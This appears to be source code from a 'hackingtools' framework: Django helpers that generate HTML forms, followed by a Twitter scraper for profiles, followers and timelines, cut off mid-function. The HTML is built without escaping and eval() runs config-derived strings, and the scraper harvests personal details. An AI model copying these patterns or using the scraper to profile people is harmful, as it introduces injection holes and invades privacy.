from . import Config, Logger, Utils, UtilsDjangoViewsAuto
if Utils.amIdjango(__name__):
    from core.library import hackingtools as ht
else:
    import hackingtools as ht
ht.Logger.setDebugModule(True)

import os as __os
from datetime import datetime

__config_locales__ = ht.Config.getConfig(parentKey='core', key='locales')

def __createModuleFunctionView__(category, moduleName, functionName, is_main=False):
    try:
        # Creates the JSON config for the view modal form
        functionParams = Utils.getFunctionsParams(category=category, moduleName=moduleName, functionName=functionName)
        
        # Get posible functions with args that uses values from another func
        funcsFromFunc = None if not hasattr( ht.getModule(moduleName), '_funcArgFromFunc_') else dict(ht.getModule(moduleName)._funcArgFromFunc_)
        
        moduleViewConfig = {}

        moduleViewConfig['__function__'] = functionName

        if not is_main:
            moduleViewConfig['__async__'] = False

            if ht.Utils.doesFunctionContainsExplicitReturn(ht.Utils.getFunctionFullCall(moduleName, ht.getModuleCategory(moduleName), functionName)):
                moduleViewConfig['__return__'] = 'text'
            else:
                moduleViewConfig['__return__'] = ''

        if not functionParams:
            # Retry for reload
            functionParams = ht.Utils.getFunctionsParams(category=category, moduleName=moduleName, functionName=functionName)

        if functionParams:
            if 'params' in functionParams:
                for param in functionParams['params']:
                    moduleViewConfig[param] = {}
                    moduleViewConfig[param]['__type__'] = 'file' if 'file' in str(param).lower() else ht.Utils.getValueType(str(param))
                    moduleViewConfig[param]['label_desc'] = param
                    moduleViewConfig[param]['placeholder'] = param
                    moduleViewConfig[param]['required'] = True

            if 'defaults' in functionParams:
                for param in functionParams['defaults']:
                    moduleViewConfig[param] = {}
                    moduleViewConfig[param]['__type__'] = 'file' if 'file' in str(param).lower() else ht.Utils.getValueType(str(functionParams['defaults'][param]))
                    moduleViewConfig[param]['label_desc'] = param
                    moduleViewConfig[param]['placeholder'] = param
                    moduleViewConfig[param]['value'] = functionParams['defaults'][param]
                    if moduleViewConfig[param]['__type__'] == 'checkbox':
                        moduleViewConfig[param]['selected'] = moduleViewConfig[param]['value']
            
            # Create the data for auto fill the param with another funcs return
            if funcsFromFunc and functionName in funcsFromFunc and len(funcsFromFunc[functionName]) > 0:
                for arg in funcsFromFunc[functionName]:
                    if arg in moduleViewConfig:
                        if not 'options_from_function' in moduleViewConfig[arg]:
                            moduleViewConfig[arg]['options_from_function'] = {}
                        for moduleToExecute in funcsFromFunc[functionName][arg]:
                            moduleViewConfig[arg]['options_from_function'][moduleToExecute] = funcsFromFunc[functionName][arg][moduleToExecute]
        else:
            ht.Logger.printMessage(message='No function params', description=functionName, debug_core=True)

        # Add pool it checkbox
        pool_param = '__pool_it_{p}__'.format(p=functionName)
        moduleViewConfig[pool_param] = {}
        moduleViewConfig[pool_param]['__type__'] = 'checkbox'
        moduleViewConfig[pool_param]['label_desc'] = 'Pool the execution to the pool list'
        moduleViewConfig[pool_param]['selected'] = False

        if is_main:
            moduleViewConfig['close'] = {}
            moduleViewConfig['close']['__type__'] = 'button'
            moduleViewConfig['close']['value'] = 'Close'

            moduleViewConfig['submit'] = {}
            moduleViewConfig['submit']['__id__'] = functionName
            moduleViewConfig['submit']['__type__'] = 'submit'
            if functionName:
                moduleViewConfig['submit']['value'] = ' '.join( [ x.capitalize() for x in functionName.split('_') ] )
            moduleViewConfig['submit']['loading_text'] = '{m}ing'.format(m=moduleName.replace('ht_', ''))

        Config.__save_django_module_config__(moduleViewConfig, category, moduleName, functionName, is_main=is_main)
        Config.switch_function_for_map(category, moduleName, functionName)
        ht.Config.__look_for_changes__()
        ht.Logger.printMessage(message='Creating Function Modal View', description=functionName, debug_core=True)
        return {functionName : moduleViewConfig}
    except Exception as e:
        Logger.printMessage(str(e), is_error=True)
        return None

def __getModulesGuiNames__():
    """Return's an Array with the Label for GUI for that module

    Parameters
    ----------
        None

    Return
    ----------
        Array
    """
    names = {}
    for tool in ht.getModulesNames():
        label = ht.Config.getConfig(parentKey='modules', key=tool, subkey='__gui_label__')
        if label:
            names[tool] = label
    return names

def __getModulesModalTests__():
    """Return's an Array with all modules as keys and their values, the Modal GUI function forms

    Parameters
    ----------
        None

    Return
    ----------
        Array
    """
    tools_functions = {}
    for tool in ht.getModulesNames():
        tool_functions = Config.getConfig(parentKey='modules', key=tool, subkey='django_form_module_function')
        if tool_functions:
            tools_functions[tool] = tool_functions
    return tools_functions

def __getModulesFunctionsCalls__():
    """Return's an Array with modules name as keys and inside it's values, 
    the key are the functions call names with a value of a template for 
    initialaizing and calling that function

    Parameters
    ----------
        None

    Return
    ----------
        Array
    """
    modulesCalls = {}
    header = "# Get the module from hackingtools\nht_loaded_{module_name} = ht.getModule(\"{module_name}\"){header_params}\n\n# Call the module\'s function for getting a result\nmod_result = ht_loaded_{module_name}.{module_function}({params})\n\n# Return it\nprint(mod_result)"

    header_params = {}
    header_params_arg = {}
    for module in ht.__modules_loaded__:
        if not module in header_params:
            header_params[module] = {}
        if not module in header_params_arg:
            header_params_arg[module] = {}
        for func in ht.__modules_loaded__[module]:
            if not func in header_params[module]:
                header_params[module][func] = "\n\n# Load the params you need\nparams = {}"
            if not func in header_params_arg[module]:
                header_params_arg[module][func] = []
            try:
                if 'original_params' in ht.__modules_loaded__[module][func]: 
                    required_params = None
                    default_params = None
                    for param in ht.__modules_loaded__[module][func]['original_params']:

                        if 'params' == param:
                            required_params = ht.__modules_loaded__[module][func]['original_params'][param]
                            for reqpar in required_params:
                                header_params[module][func] += '\n\nparams[\'{p}\'] = input(\'Set the param {p}: \')'.format(p=reqpar)
                                header_params_arg[module][func].append('{p}=params[\'{p}\']'.format(p=reqpar))

                        if 'defaults' == param:
                            default_params = ht.__modules_loaded__[module][func]['original_params'][param]
                            for defpar in default_params:
                                if default_params[defpar] == 'None' or default_params[defpar] == None or isinstance(default_params[defpar], int) or isinstance(default_params[defpar], list) or isinstance(default_params[defpar], dict):
                                    header_params[module][func] += '\n\nparams[\'{p}\'] = input(\'Set the param {p} (Default value: {d}): \')\nif not params[\'{p}\']:\n\tparams[\'{p}\'] = {d}'.format(p=defpar, d=default_params[defpar])
                                else:
                                    header_params[module][func] += '\n\nparams[\'{p}\'] = input(\'Set the param {p} (Default value: {d}): \')\nif not params[\'{p}\']:\n\tparams[\'{p}\'] = \'{d}\''.format(p=defpar, d=default_params[defpar])
                                header_params_arg[module][func].append('{p}=params[\'{p}\']'.format(p=defpar))

            except:
                header_params[module][func] = ''
    for module in ht.__modules_loaded__:
        module_funcs = {}
        for func in ht.__modules_loaded__[module]:
            try:
                for param in ht.__modules_loaded__[module][func]['original_params']:
                    moduleParams = ht.__modules_loaded__[module][func]['original_params'][param]
                    if not moduleParams:
                        moduleParams = []
                    module_funcs[func] = header.format(header_params=header_params[module][func], module_name=module.split('.')[-1], module_function=func, module_function_params=', '.join(moduleParams), params=', '.join(header_params_arg[module][func]))
            except:
                module_funcs[func] = header.format(header_params=header_params[module][func], module_name=module.split('.')[-1], module_function=func, module_function_params='')
        modulesCalls[module.split('.')[-1]] = module_funcs
    return modulesCalls

def __getModulesFunctionsForMap__():
    functions = {}
    for module in ht.__modules_loaded__:
        functions[module.split('.')[-1]] = []
        for f in ht.__modules_loaded__[module]:
            functionName = f.split('.')[-1]
            conf_func = Config.getConfig(parentKey='django', key='maps', subkey=module.split('.')[-1], extrasubkey=functionName)

            if not conf_func:
                Config.switch_function_for_map(ht.getModuleCategory(module.split('.')[-1]), module.split('.')[-1], functionName)
            else:
                in_maps = '__in_map_{f}__'.format(f=functionName)

                if in_maps in conf_func and conf_func[in_maps] == True:
                    functions[module.split('.')[-1]].append(functionName)

        if not functions[module.split('.')[-1]]:
            functions[module.split('.')[-1]] = []

    return functions

def __getModulesConfig_treeView__():
    """Return a String with the config for the GUI Treeview

    Parameters
    ----------
        None

    Return
    ----------
        String
    """
    result_text = []
    tools_config = ht.__getModulesFullConfig__()
    __treeview_load_all__(config=tools_config, result_text=result_text)
    response =  ','.join(result_text)
    return response

def __regenerateConfigView__(moduleName):
    Config.__regenerateConfigModulesDjango__({}, ht.getModuleCategory(moduleName), moduleName)

def __getReturnAsModalHTML__(response, main=True):
    res = ''
    default_classnames_per_type = Config.getConfig(parentKey='django', key='html', subkey='modal_forms', extrasubkey='default_types')
    res_type = Utils.getValueType(response, getResponse=True)
    if isinstance(response, dict):
        for key, val in response.items():
            if val:
                val_type_temp = Utils.getValueType(val, getResponse=True, returnLiteralType=True)
                if val_type_temp == list:
                    res += "<label for=\"{id}\">{input_label_desc}</label>".format(id=key, input_label_desc=key)
                    res += __getReturnAsModalHTML__(list(val), main=False)
                elif val_type_temp == bool:
                    res += __getReturnAsModalHTML__(bool(val), main=False)
                elif val_type_temp == dict:
                    res += __getReturnAsModalHTML__(val, main=False)
                else:
                    val_type = Utils.getValueType(val, getResponse=True)
                    try:
                        input_className = default_classnames_per_type[val_type]['__className__']
                    except:
                        input_className = ''

                    if val_type == 'checkbox':
                        res += "<div class=\"checkbox\"><input type=\"checkbox\" class=\"checkbox\" data-toggle=\"toggle\" data-on=\"On\" data-off=\"Off\" data-onstyle=\"primary\" data-offstyle=\"warning\" id=\"{id}\" name=\"{id}\" {checked} disabled><label style=\"padding: 0 10px;\" for=\"{id}\">{input_label_desc}</label></div><br />".format(id=key, input_label_desc=key, checked=val)
                    
                    elif val_type == 'number':
                        res += "<div class='md-form'><label for=\"{id}\">{input_label_desc}</label><input class=\"{className}\" type=\"number\" value=\"{input_value}\" name=\"{id}\" /></div>".format(id=key, input_label_desc=key, className=input_className, input_value=val)

                    elif val_type == 'textarea' or val_type == 'data':
                        res += "<div class=\"md-form\"><label for=\"{id}\">{input_label_desc}</label><textarea class=\"{className}\" name=\"{id}\" id=\"{id}\" rows=\"{rows}\">{value}</textarea></div>".format(className=input_className, id=key, input_label_desc=key, value=val, rows=int(int( len(val)/80 ) + val.count('\n') ) )

                    elif val_type == 'image':
                            res += "<div class='md-form'><label for=\"{id}\">{input_label_desc}</label></br><img src=\"{input_value}\" name=\"{id}\" class=\"response_image\" /></div>".format(id=key, input_label_desc=key, className=input_className, input_value=val)
                    
                    elif val_type == 'time':
                        val = val.strftime("%d-%m-%Y %H:%M:%S")
                        res += "<div class='md-form'><label for=\"{id}\">{input_label_desc}</label><input class=\"{className}\" type=\"text\" value=\"{input_value}\" name=\"{id}\" /></div>".format(id=key, input_label_desc=key, className=input_className, input_value=val)
                    else:
                        res += "<div class='md-form'><label for=\"{id}\">{input_label_desc}</label>".format(id=key, input_label_desc=key)
                        res += __getReturnAsModalHTML__(val, main=False)
                        res += "</div>"
    elif isinstance(response, int):
        val_type = Utils.getValueType(response, getResponse=True)
        try:
            input_className = default_classnames_per_type[val_type]['__className__']
        except:
            input_className = ''
        return "<div class='md-form'><input class=\"{className}\" type=\"number\" value=\"{input_value}\" /></div>".format(className=input_className, input_value=response)
    elif isinstance(response, bool):
        return "<div class=\"checkbox\"><input type=\"checkbox\" class=\"checkbox\" data-toggle=\"toggle\" data-on=\"On\" data-off=\"Off\" data-onstyle=\"primary\" data-offstyle=\"warning\" {checked} disabled></div><br />".format(checked=response)
    elif res_type == 'select':
        if isinstance(response, str):
            response = list(response)
        
        use_hr = False
        for r in response:
            res += "<ul class=\"list-group list-group-flush\">"

            if isinstance(r, str) and Utils.getValueType(r, getResponse=True) == 'text':
                try:
                    input_className = default_classnames_per_type['text']['__className__']
                except:
                    input_className = ''
                
                form = 'md-form'
                if not main:
                    form = 'md-form-item'
                res += "<div class='{form}'><input class=\"{className}\" type=\"text\" value=\"{input_value}\" name=\"{id}\" /></div>".format(form=form, id=r, className=input_className, input_value=r)
            else:
                use_hr = True
                res += "<li class=\"list-group-item\">{value}</li>".format(value=__getReturnAsModalHTML__(r, False))
                
            res += "</ul>"

            if not main and len(response) > 1 and use_hr:
                res += "<hr class='sidebar-divider my-0 my-separator-response'>"
    else:
        val_type = Utils.getValueType(response, getResponse=True)
        try:
            input_className = default_classnames_per_type[val_type]['__className__']
        except:
            input_className = ''
        if val_type == 'checkbox':
            return "<div class=\"checkbox\"><input type=\"checkbox\" class=\"checkbox\" data-toggle=\"toggle\" data-on=\"On\" data-off=\"Off\" data-onstyle=\"primary\" data-offstyle=\"warning\" id=\"response-{id}\" name=\"{id}\" {checked} disabled><label style=\"padding: 0 10px;\" for=\"response-{id}\">True or False?</label></div><br />".format(id=response, checked=response)
        elif val_type == 'data' or val_type == 'textarea':
            return "<div class=\"md-form\"><label for=\"response-{id}\">data</label><textarea class=\"{className}\" name=\"response-{id}\" id=\"response-{id}\" rows=\"{rows}\">{value}</textarea></div>".format(className=input_className, id=response[0], value=response, rows=int( int( len(response)/80 ) + response.count('\n') ) )
        elif val_type == 'password':
            return "<div class='md-form'><input class=\"{className}\" type=\"password\" value=\"{input_value}\"/></div>".format(className=input_className, input_value=response)
        elif val_type == 'image':
            return "<div class='md-form'><label for=\"response-img\">image</label></br><img src=\"{input_value}\" name=\"response-img\" class=\"response_image\" /></div>".format(className=input_className, input_value=response)
        else:
            # if val_type == 'url':
            #     return "<button class=\"btn\" data-clipboard-target=\"#response\"><img src=\"/static/core/img/clippy.svg\" alt=\"Copy to clipboard\"></button><div class='md-form'><input class=\"{className}\" type=\"text\" id=\"response\" value=\"{input_value}\"/></div>".format(className=input_className, input_value=response)
            return "<div class='md-form'><input class=\"{className}\" type=\"text\" id=\"response\" value=\"{input_value}\"/></div>".format(className=input_className, input_value=response)
    return res


# TreeView for Modules Configuration in Modal Panel
global __treeview_counter__
__treeview_counter__ = 0

# ! Slows down the first load of HT in Django or the calls to "home"
def __treeview_load_all__(config, result_text, count=0, count_pid=-1):
    """Loads the GUI Treeview with the config of all the modules loaded

    Parameters
    ----------
        config = Array
        result_text = String
        count = int
        count_pid = int

    Return
    ----------
        None
    """
    count += 1
    count_pid += 1
    for c in config:
        count += 1
        count = __treeview_count__(count)
        result_text.append(__treeview_createJSON__(conf_key=config[c], key=c, count=count, pid=count_pid))
        ht.Logger.printMessage('{msg} - {key} - {n} - {m}'.format(msg='Pasando por: ', key=c, n=count, m=count_pid), is_warn=True, debug_core=True)
        if not isinstance(config[c], str) and not isinstance(config[c], bool) and not isinstance(config[c], int) and not isinstance(config[c], float):
            try:
                __treeview_load_all__(config=config[c],result_text=result_text, count=count, count_pid=count-1)
                count += 1
            except:
                try:
                    __treeview_load_all__(config=tuple(config[c]),result_text=result_text, count=count, count_pid=count-1)
                    count += 1
                    ht.Logger.printMessage('{msg} - {key} - {conf_key}'.format(msg=__config_locales__['error_json_data_loaded'], key=c, conf_key=config[c]), is_warn=True, debug_core=True)
                except:
                    ht.Logger.printMessage('{msg} - {key} - {conf_key}'.format(msg=__config_locales__['error_json_data_not_loaded'], key=c, conf_key=config[c]), color=ht.Logger.__Fore.RED, debug_core=True)
        count += 1

def __treeview_count__(count):
    global __treeview_counter__
    if count < __treeview_counter__:
        count = __treeview_counter__
    count += 1
    __treeview_counter__ = count
    return count
    
def __treeview_createJSON__(conf_key, key, count=1, pid=0):
    """Return JSON String with the config for the treeview

    Parameters
    ----------
        conf_key = String
        key = String
        count = int
        pid = int

    Return
    ----------
        String JSON Format
    """
    try:
        open_key = "{"
        close_key = "}"
        if isinstance(conf_key, str):
            return '{open_key}id:{count},name:"{name}",pid:{pid},value:"{value}"{close_key}'.format(open_key=open_key, count=count, name=key, pid=pid, value=conf_key, close_key=close_key)
        else:
            return '{open_key}id:{count},name:"{name}",pid:{pid},value:""{close_key}'.format(open_key=open_key, count=count, name=key, pid=pid, close_key=close_key)
    except:
        ht.Logger.printMessage('{msg} - {key} - {conf_key}'.format(msg=__config_locales__['error_load_json_data'], key=key, conf_key=conf_key), is_error=True)

# End of TreeView

# Core

def __getModulesDjangoForms__():
    forms = {}
    for mod in ht.getModulesNames():
        form = __createHtmlModalForm__(mod)
        if form:
            for url in form:
                if form[url]:
                    forms[mod] = form
    return forms

def __createHtmlModalForm__(mod, config_subkey='django_form_main_function', config_extrasubkey=None, session_id=None):
    module_form = Config.getConfig(parentKey='modules', key=mod, subkey=config_subkey, extrasubkey=config_extrasubkey)
    functionModal = Config.getConfig(parentKey='modules', key=mod, subkey=config_subkey, extrasubkey='__function__')
    default_classnames_per_type = Config.getConfig(parentKey='django', key='html', subkey='modal_forms', extrasubkey='default_types')
    
    if not module_form:
        return
    
    html = "<div class=\"modal-body\">"
    footer = '<div class="modal-footer">'
    m_form = module_form

    # For ajax
    submit_id = ''

    if '__function__' in m_form:
        submit_id = 'submit_{mod}_{name}'.format(mod=mod, name=m_form['__function__'])

    for m in m_form:
        temp_m_form = m_form
        if not m == '__async__' and not m == '__function__' and not '__separator' in m and (isinstance(temp_m_form, dict) and (('systems' in temp_m_form[m] and __os.name in temp_m_form[m]['systems']) or not 'systems' in temp_m_form[m])):
            if '__type__' in temp_m_form[m]:
                input_type = temp_m_form[m]['__type__']
                
                input_className = ''
                if not input_type in default_classnames_per_type:
                    ht.Logger.printMessage(message='__createHtmlModalForm__', description='There is no __className__ defined for this type of input \'{input_type}\''.format(input_type=input_type), color=ht.Logger.__Fore.YELLOW)
                else:
                    input_className = default_classnames_per_type[input_type]['__className__']

                input_placeholder = ''
                if 'placeholder' in temp_m_form[m]:
                    input_placeholder = temp_m_form[m]['placeholder']
                
                input_label_desc = ''
                if 'label_desc' in temp_m_form[m]:
                    input_label_desc = temp_m_form[m]['label_desc']
                
                input_value = ''
                if 'value' in temp_m_form[m]:
                    input_value = temp_m_form[m]['value']

                if 'api' in m:
                    input_value = Config.getAPIKey('{m}_api'.format(m=mod.split('_')[-1]), session_id=session_id)
                    input_className = ' '.join([input_className, 'apiKey'])
                    
                if input_value != 0 and (not input_value or 'None' == input_value or 'null' == input_value):
                    input_value = ''

                checkbox_selected = False
                if 'selected' in temp_m_form[m]:
                    checkbox_selected = temp_m_form[m]['selected']
                
                loading_text = ''
                if 'loading_text' in temp_m_form[m]:
                    loading_text = temp_m_form[m]['loading_text']
                
                required = ''
                if 'required' in temp_m_form[m] and temp_m_form[m]['required'] == True:
                    required = 'required'
                
                # Creates a select if any options are filled by another func
                try:
                    options_from_function = []
                    if 'options_from_function' in temp_m_form[m]:
                        options_from_function = temp_m_form[m]['options_from_function']
                        for optModuleName in options_from_function:
                            if optModuleName in ht.getModulesNames() or optModuleName in [ moduleNm.replace('ht_', '') for moduleNm in ht.getModulesNames() ]:
                                functionCall = 'ht.getModule(\'{mod}\').{func}()'.format(mod=optModuleName, func=temp_m_form[m]['options_from_function'][optModuleName])
                                options_from_function = eval(functionCall)
                            elif 'core' == optModuleName:
                                functionCall = 'ht.{func}()'.format(func=temp_m_form[m]['options_from_function'][optModuleName])
                                options_from_function = eval(functionCall)
                            else:
                                functionCall = '{m}.{func}()'.format(m=optModuleName, func=temp_m_form[m]['options_from_function'][optModuleName])
                                options_from_function = eval(functionCall)
                except Exception as e:
                    Logger.printMessage(str(e), is_error=True)
                    options_from_function = []
                
                if options_from_function:
                    input_type = 'select'

                if input_type == 'file':
                    html += "<div class='input-group'>"
                    html += "<input type='file' class='custom-file-input' name='{id}' {required}>".format(id=m, required=required)
                    html += "<label class='custom-file-label' for='{id}'>Choose file</label>".format(id=m)
                    html += "</div>"

                elif input_type == 'checkbox':
                    checkbox_disabled = ''
                    color_on = 'primary'
                    color_off = 'warning'
                    
                    
                    if '__pool_it_' in m and not ht.__WANT_TO_BE_IN_POOL__:
                        checkbox_disabled = 'disabled'
                        color_on = 'default'
                        color_off = 'default'
                    
                    if checkbox_selected:
                        html += "<div class=\"checkbox\"><input type=\"checkbox\" class=\"checkbox\" data-toggle=\"toggle\" data-on=\"On\" data-off=\"Off\" data-onstyle=\"{color_on}\" data-offstyle=\"{color_off}\" id=\"{id}\" name=\"{id}\" {required} checked {disabled}><label style=\"padding: 0 10px;\" for=\"{id}\">{input_label_desc}</label></div><br />".format(color_on=color_on, color_off=color_off, id=m, input_label_desc=input_label_desc, required=required, disabled=checkbox_disabled)
                    else:
                        html += "<div class=\"checkbox\"><input type=\"checkbox\" class=\"checkbox\" data-toggle=\"toggle\" data-on=\"On\" data-off=\"Off\" data-onstyle=\"{color_on}\" data-offstyle=\"{color_off}\" id=\"{id}\" name=\"{id}\" {required} {disabled}><label style=\"padding: 0 10px;\" for=\"{id}\">{input_label_desc}</label></div><br />".format(color_on=color_on, color_off=color_off, id=m, input_label_desc=input_label_desc, required=required, disabled=checkbox_disabled)
                
                elif input_type == 'select':

                    html += "<span class=\"name-select\" value=\"{placeholder}\">{placeholder}</span><select id=\"editable-select-{id}\" name=\"{id}\" placeholder=\"{placeholder}\" class=\"{className}\" {required}>".format(placeholder=input_placeholder, className=input_className, id=m, required=required)
                    html += "<option value='{input_value}' selected>{input_value}</option>".format(input_value=input_value)

                    if input_value in options_from_function:
                        options_from_function.remove(input_value)

                    for func in options_from_function:
                        html += "<option value='{cat}'>{cat}</option>".format(cat=func)
                    
                    html += "</select><script>$('#editable-select-{id}').editableSelect();".format(id=m)

                    if required != '':
                        html += "$('#editable-select-{id}').prop('required',true);".format(id=m)

                    html += "</script>"

                elif input_type == 'button':

                    footer += "<button type=\"button\" class=\"{className}\" data-dismiss=\"modal\">{input_value}</button>".format(className=input_className, input_value=input_value)

                elif input_type == 'submit':

                    submit_id = '{m}_{f}'.format(m=m, f=config_extrasubkey)
                    footer += "<input type=\"submit\" class=\"{className}\" value=\"{input_value}\" id=\"{id}\" />".format(className=input_className, input_value=input_value, id=submit_id)
                    
                    if loading_text:
                        footer += "<script>$('#"
                        footer += m
                        footer += "').on('click', function(e){$('#"
                        footer += m
                        footer += "').attr('value', '{loading_text}'); e.preventDevault();".format(loading_text=loading_text)
                        footer += "});</script>"

                elif input_type == 'textarea':

                    if input_label_desc:
                        html += "<div class=\"form-group row\"><label for=\"{id}\" class=\"col-4 col-form-label label-description\">{input_label_desc}</label><div class=\"col-4\"><textarea class=\"{className}\" name=\"{id}\" id=\"{id}\" rows=\"{rows}\" placeholder=\"{placeholder}\"></textarea></div></div>".format(className=input_className, id=m, placeholder=input_placeholder, input_label_desc=input_label_desc, rows=str( int( len(input_placeholder)/100 ) + input_placeholder.count('\n') ) )
                    else:
                        html += "<textarea class=\"{className}\" name=\"{id}\" id=\"{id}\" rows=\"{rows}\" placeholder=\"{placeholder}\"></textarea>".format(className=input_className, id=m, placeholder=input_placeholder, rows=str( int( len(input_placeholder)/100 ) + input_placeholder.count('\n') ) )

                else:
                    html += "<div class='md-form'><label for=\"{id}\">{input_label_desc}</label><input class=\"{className}\" type=\"{input_type}\" value=\"{input_value}\" placeholder=\"{placeholder}\" name=\"{id}\" {required}/></div>".format(id=m, placeholder=input_placeholder, input_label_desc=input_label_desc, className=input_className, input_type=input_type, input_value=input_value, required=required)

        if '__separator' in m and '__' == m[-2:] and m_form[m] == True:
            html += "<hr class='sidebar-divider my-0 my-separator'>"

    for m in m_form:
        if '__async__' == m and m_form[m]:
            html += "<input type='text' value='true' id='is_async' hidden />"

    footer += '</div>'
    html += footer
    html += '</div>'

    for m in m_form:
        if '__async__' == m and m_form[m] == True:
            async_script = "<script> $(function() { "
            async_script += "$('#{submit_id}').click(function(e)".format(submit_id=submit_id)
            async_script += "{ e.preventDefault();"
            async_script += "$.ajax({"
            async_script += "headers: { 'X-CSRFToken': '{"
            async_script += "{csrf_token"
            async_script += "}"
            async_script += "}' }, "
            async_script += "cache: false, contentType: false, processData: false, "
            if config_extrasubkey:
                async_script += "url : '/modules/{mod}/{functionName}/', type : 'POST', async: true, data: $('#form_{mod}_{functionName}').serializeArray(), ".format(mod=mod, functionName=config_extrasubkey)
            else:
                async_script += "url : '/modules/{mod}/{mod}/', type : 'POST', async: true, data: $('#form_{mod}').serializeArray(), ".format(mod=mod)
            async_script += "success : function(res) {"
            async_script += "if('data' in res){"
            async_script += "alert(res.data)"
            async_script += "} else { "
            async_script += "alert('Error')"
            async_script += "}"
            async_script += "}, error : function(xhr,errmsg,err) { console.log(xhr.status + ': ' + xhr.responseText); } }); }); }); </script>"
            html += async_script
    if config_subkey == 'django_form_main_function':
        return {functionModal : html}
    return html

def __getModulesDjangoFormsModal__(session_id=None):
    forms = {}
    for mod in ht.getModulesNames():
        mod_data = {}
        functions = __getModuleFunctionNamesFromConfig__(mod)
        if functions:
            for functs in functions:
                form = __createHtmlModalForm__(mod, 'django_form_module_function', functs, session_id)
                if form:
                    mod_data[functs] = form
        if mod_data:
            forms[mod] = mod_data
    return forms

def __getModuleFunctionNamesFromConfig__(mod):
    functions = ht.Config.getConfig(parentKey='modules', key=mod, subkey='django_form_module_function')
    if functions:
        return [func_name for func_name in functions]
    else:
        return

# End Core


from hackingtools.core import Logger, Utils, Config
from hackingtools.core.Objects import RequestHandler
from hackingtools.core.Exceptions import IndexError, ConnectionTimeout, InvalidValue, QueryError, ParameterRequired
import hackingtools as ht
import os, requests, json, time, re
from time import sleep
from datetime import datetime
from bs4 import BeautifulSoup
import pandas as pd

config = Config.getConfig(parentKey='modules', key='ht_twitter')
output_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), 'output'))

BASE_URL = "https://twitter.com/"
MOBILE_URL = "https://mobile.twitter.com/"
TIMELINE_WITH_TOKEN_QUERY = "i/search/timeline?vertical=default&src=unkn&include_available_features=1&include_entities=1&max_position=%TOKEN%&reset_error_state=false&f=tweets&q="

class StartModule():

	class __FFClass__:
		def __init__(self, username, avatar, fullname):
			"""Data model for followers/followings
			
			Arguments:
				username {str} -- [description]
				user_id {int} -- [description]
				avatar {str} -- [description]
				fullname {str} -- [description]
			"""
			self.username = username
			self.avatar = avatar
			self.fullname = fullname

		def __str__(self):
			return str(self.__dict__)

	class __TimelineClass__:
		def __init__(self, tweet_id, tweet_link, conversation_id, is_reply, has_parent, screen_name, name, user_id, user_mentions, content, reply_count, retweet_count, likes_count, created_at):
			"""
			:param tweet_id:
			:param tweet_link:
			:param conversation_id:
			:param is_reply:
			:param has_parent:
			:param screen_name:
			:param name:
			:param user_id:
			:param user_mentions:
			:param content:
			:param reply_count:
			:param retweet_count:
			:param likes_count:
			"""
			self.tweet_id = tweet_id
			self.tweet_link = tweet_link
			self.conversation_id = conversation_id
			self.is_reply = is_reply
			self.has_parent = has_parent
			self.screen_name = screen_name
			self.name = name
			self.user_id = user_id
			self.user_mentions = user_mentions
			self.content = content
			self.reply_count = reply_count
			self.retweet_count = retweet_count
			self.likes_count = likes_count
			self.created_at = created_at

		def __str__(self):
			return str(self.__dict__)

	class __ProfileClass__:
		def __init__(self, name, verified, protected, username, bio, location, url, joined_date, birthday, user_id, tweet_count, following_count, follower_count, like_count):
			"""
			User profile data model
			"""
			self.name = name
			self.verified = verified
			self.protected = protected
			self.username = username
			self.bio = bio
			self.location = location
			self.url = url
			self.joined_date = joined_date
			self.birthday = birthday
			self.user_id = user_id
			self.tweet_count = tweet_count
			self.following_count = following_count
			self.follower_count = follower_count
			self.like_count = like_count

		def __str__(self):
			return str(self.__dict__)

	def __init__(self):
		self._main_gui_func_ = 'get_user'
		self.proxy = ''

	def help(self):
		Logger.printMessage(message=ht.getFunctionsNamesFromModule('ht_twitter'))

	def searchTweets(self, username="", since="", until="", query="", limit=1000, verified=False, proxy="", interval=0):
		"""Advanced search engine"""

		cursor = "-1"
		has_more: bool = True
		result: list = []
		req = RequestHandler(user_agent="TIMELINE", ret="json")
		if proxy:
			req.proxy = proxy

		if since:
			since = int(time.mktime(datetime.strptime(since, "%Y-%m-%d").timetuple()))

		if until:
			if len(until) == 4:
				until = f"{until}-01-01"

		query_structure = {
			"from": f"+from:{username}",
			"since": f"+since:{since}",
			"verified": ":verified",
			"until": f"+until:{until}",
			"query": f"+{query}"
		}

		if username and query:
			""" not allowed """
			raise QueryError("`username` and `query` parameter not allowed together.")

		if since and until:
			""" not allowed """
			raise QueryError("`since` and `until` parameter not allowed together.")

		url = BASE_URL+TIMELINE_WITH_TOKEN_QUERY
		url = url.replace("%TOKEN%", cursor)

		# if there was username or query
		if username or query:
			if username:
				url += query_structure['from']
			else:
				url += query_structure['query']

		# if username and query aren't set properly raise error
		else:
			raise ParameterRequired("`username` or `query` required for search.")

		if since or until:
			if since:
				url += query_structure['since']
			elif until:
				url += query_structure['until']

		if verified:
			url += query_structure['verified']

		while has_more:
			res = req.get(url=url)
			if res:
				cursor, has_more = self.__extract_timeline_cursor__(response=res)
				if cursor:
					extracted_tweets = self.__extract_timeline__(res['items_html'])
					result.extend(extracted_tweets)
					url = url.replace("%TOKEN%", cursor)
					# check limitation
					if int(limit) > 0:
						if len(result) > int(limit):
							return result[:int(limit)]
					else:
						sleep(interval)
						continue
				else:
					break
				sleep(interval)
			else:
				return result

		return result

	def get_followers(self, username, limit=1000, interval=0):
		"""
		get user followers
		:param username:
		:param interval:
		:param limit:
		:return:
		"""
		return self.__follower_following__(username=username, limit=limit, proxy=self.proxy, interval=interval)

	def get_friends(self, username, limit=1000, interval=0):
		"""
		get user friends
		:param username:
		:param limit:
		:param interval:
		:return:
		"""
		return self.__follower_following__(username=username, limit=limit, proxy=self.proxy, type_="followings", interval=interval)

	def get_timeline(self, username, limit=1000, interval=0):
		"""
		get user timeline
		:param username:
		:param limit:
		:param interval:
		:return:
		"""
		return self.__timeline__(username=username, limit=limit, proxy=self.proxy, interval=interval)

	def get_user(self, username):
		"""
		get user profile info
		:param username:
		:return:
		"""
		return self.__profile__(username=username, proxy=self.proxy)

	def __follower_following__(self, username, limit=1000, type_="followers", proxy=None, interval=0):
		"""
		Followers/Followings scraper
		:param username:
		:param limit:
		:param type_:
		:param proxy:
		:param interval:
		:return:
		"""
		result = []
		cursor = str()
		first_request: bool = True
		has_more: bool = True
		# mode = FF -> followers/followings user-agent
		req = RequestHandler(user_agent="FF")
		# if proxy enabled set it
		if proxy:
			req.proxy = proxy
		while has_more:
			if first_request:
				url = MOBILE_URL + f"/{username}/{type_}/?lang=en"
